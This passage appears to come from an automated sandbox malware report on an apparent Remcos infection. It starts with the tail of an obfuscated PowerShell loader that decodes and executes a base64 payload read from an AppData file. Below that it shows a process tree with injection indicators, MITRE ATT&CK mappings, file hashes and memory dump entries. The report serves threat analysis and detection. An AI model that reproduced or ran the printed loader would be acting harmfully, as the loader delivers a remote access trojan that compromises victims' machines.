rmegJNotesERadikrLystrnSpateEIsskr=Kamik(MelodtUnwo,eWoompsove sTSace -Dyvl Pb.uneaFugtiTfem nh Mank Inte$Cra idBerksI MgliSSvvesfUnflaABroddVPromirA dis)Holo, ');while (!$Klbehjerne) {Geometrier (Pyraloid ' omma$ShipmgTitoilSpaanoglacibResinarusldlAfvrg:D,ndeE Plecn RalltViljeaF.ansnSto mgSmmetl BefoeVersidLedsalExcomy ntra=prepo$IridktInterrRaadiu Cranedekk, ') ;Geometrier $Kunsthaandvrk;Geometrier (Pyraloid 'afspnSS camtlakf a KronrS llat Prop-le tiS Ko klichthe Felde K ngpRound Un,ud4 Unf ');Geometrier (Pyraloid 'Bygrn$ B angspewslMy moo Zambb rantaWea ol Folk:aftgtK A tilNemerbKongreIvanah intj TrimeRe atrBissenMa zie S pt= Rok (Inv rTFrif.ebewarsZephitNar,o-Wors,P boliaBraint TuyehInt,r Stikk$A driDBasali TaarsConfifForneaReprev S,ytrOsage) ivid ') ;Geometrier (Pyraloid 'F bri$Sy.ecgFingel Sta oResidbQu ndaQuruslMoti : CarnRUnde,o Knsto sthmfAdresl mon i Outcn Arc eF.rmusAusk = anke$pantegDend lKag eo Trykb .ipsa Ly tlBista:BantuMAn hte OrnidDriftdUdv deMusiolUndrasVe froStrepmOm enmL sineScr brMislae ektisRa kn+Sovep+ Inte%Sydam$B osyT FleuononsprRetagsForremPlutei UnamnImpredReasseOverh1Nonpe0Nskeg4Heroi.Sinkac Flayo Cotou MetrnIno etVa be ') ;$Corbeils=$Torsminde104[$Rooflines];}$renumbered=345156;$Botnisk=27968;Geometrier (Pyraloid ' Sch,$Skralg olll SubtoDandybSeksuaColonl Rock:ultimBTredviPhen iDublanBlodbdSrlovtRecorgSejlbtBeneae spe rO tcln DisteTerris hamn1 entr3cleme1Efter An i=Subto Ne roG Skrue.lkretO.tho-AllusCShoweo InstnBogtrtScat.elistenBrudftEfter udst$MudroDA lgsiKinoss OprefAfloeaDessev D ntr Tres ');Geometrier (Pyraloid 'P nsi$Asparg Cricl Debao jergbFe lraEfte lBl kf:TiddlPEstimlSprjtoPe riv proge D mnr awkw Fak i=Rad e Sele[ .ereSVoracySt.sesFimbrtApolle Scr mMis a.UdbriCDege oH moonAlkymvP,liteDi chr T.sttEft r] Pat :H nsy:Sa leFArketrPointoSkil,mDvrgvBBeboeaGratis,irkeeUnhar6strsu4Fa tfSDiskutKontorCockiiBellinPaas g.onvo(Bygge$AnflyBFibroiB wshiep sknTakk.dBrndetAfretgUnex tAss reNicarrUdtrkn MinieDru,msStign1Klima3Kompl1Utjle) Spar ');Geometrier (Pyraloid 'Bisma$Fler.g Ina.lSlotsoMortabAyo daAlbuelRegns:SociaFSw ptoPeriurGittedMikroo AcrabSlynglOregoi PotenClaxogUnrele PotenLirels lack1Exult7 Abes3 ridb Ve,se= .rel Ankla[DatabSNedsty Fores Yawnt Po.oeSvrmem Zygo.S epnT oyedeSp inxRediatParri.TagskE p ognSpeedcIsnedoso endvekseiKetchn VenigExped]i blo: ,uto: LegaATraveSFlag CForhaIM rglI nder.HalveG FinieNrittt mmunSTabultT,arirG.undiIndfyn Integwee i(.uber$FubssPA.mysl ramo atirvAfholeLander Rech)Sebor ');Geometrier (Pyraloid 'Klunt$ NutsgHerrelKiasmo lbumbF ackaAutonlRev,v: SterFSpi ii Diprf Strofr,lgni HusdgBero hLaddeeBlackdMyzodeHyperrheroin rtlie OctisFauc.=Desse$Pr.adFStilboPen,er nspidRingboChem bTyknil Rusti Relen Probg,irmee .ntonCykels Tank1,osit7Igni 3 Stb .KatodsMilliu HypebOccupstonertUltrarBo.eyiTilstnAng,igPetit(Sam.r$Legibr DeroeProfin Stinubeskum aforbInklieShinnrudfake,rtild Erik,Kostl$RaserBS.alsord,omtHomosn Sub.iAlgiesSan ekDepri)Bista ');Geometrier $Fiffighedernes;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\parorexia.Ska && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4560
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
df13dd803e57843822aa7650d21f71d0

SHA1
cd530970502100409c5fec9746ce30410d007660

SHA256
2b917475ebb93a656d9fe01c822b1d59135c0bc3082a60ae5b72ba451def1267

SHA512
d69daa1f590f497932637d950df5c2b117c358b61b3946781331487b1fdf082f0b9c67a7532e677263be2e2681ae6a386e2ca24f830ecac89441472d649fe63e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dlbq30v2.5ir.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\parorexia.Ska

Filesize
485KB

MD5
ffb8ce411a83fcffdf0ad8c5baeb0b2c

SHA1
d27fbf5f53f72d0589282f62e62b8d62c6604e56

SHA256
950029f62e2742aac5b33c7636b5d6a875f296884ad238ca70051298f01ea4fb

SHA512
fcad7af0dbbea2aaab7629678ad8f1e7af4a9b42516c3d856b88e15ea39bc520299240d96cecabe56b2dcbe261b040b55e18b03a9c58c83f48d28cca06526dee

Download Submit
memory/1208-20-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-16-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-19-0x00007FFE6E0E3000-0x00007FFE6E0E5000-memory.dmp

Filesize
8KB

Download
memory/1208-36-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-4-0x00007FFE6E0E3000-0x00007FFE6E0E5000-memory.dmp

Filesize
8KB

Download
memory/1208-15-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-64-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-47-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/1208-5-0x0000023EC1DD0000-0x0000023EC1DF2000-memory.dmp

Filesize
136KB

Download
memory/1208-37-0x00007FFE6E0E0000-0x00007FFE6EBA1000-memory.dmp

Filesize
10.8MB

Download
memory/3396-21-0x0000000004710000-0x0000000004746000-memory.dmp

Filesize
216KB

Download
memory/3396-42-0x0000000006E50000-0x0000000006EE6000-memory.dmp

Filesize
600KB

Download
memory/3396-38-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

Filesize
120KB

Download
memory/3396-39-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

Filesize
304KB

Download
memory/3396-40-0x0000000007360000-0x00000000079DA000-memory.dmp

Filesize
6.5MB

Download
memory/3396-41-0x0000000006D10000-0x0000000006D2A000-memory.dmp

Filesize
104KB

Download
memory/3396-43-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/3396-35-0x0000000005670000-0x00000000059C4000-memory.dmp

Filesize
3.3MB

Download
memory/3396-44-0x0000000007F90000-0x0000000008534000-memory.dmp

Filesize
5.6MB

Download
memory/3396-25-0x00000000054C0000-0x0000000005526000-memory.dmp

Filesize
408KB

Download
memory/3396-46-0x0000000008540000-0x0000000009A9E000-memory.dmp

Filesize
21.4MB

Download
memory/3396-24-0x00000000053E0000-0x0000000005446000-memory.dmp

Filesize
408KB

Download
memory/3396-22-0x0000000004DB0000-0x00000000053D8000-memory.dmp

Filesize
6.2MB

Download
memory/3396-23-0x0000000004CE0000-0x0000000004D02000-memory.dmp

Filesize
136KB

Download
memory/4380-61-0x0000000001C60000-0x00000000031BE000-memory.dmp

Filesize
21.4MB

Download
memory/4380-48-0x0000000001C60000-0x00000000031BE000-memory.dmp

Filesize
21.4MB

Download

Analysis

Sharing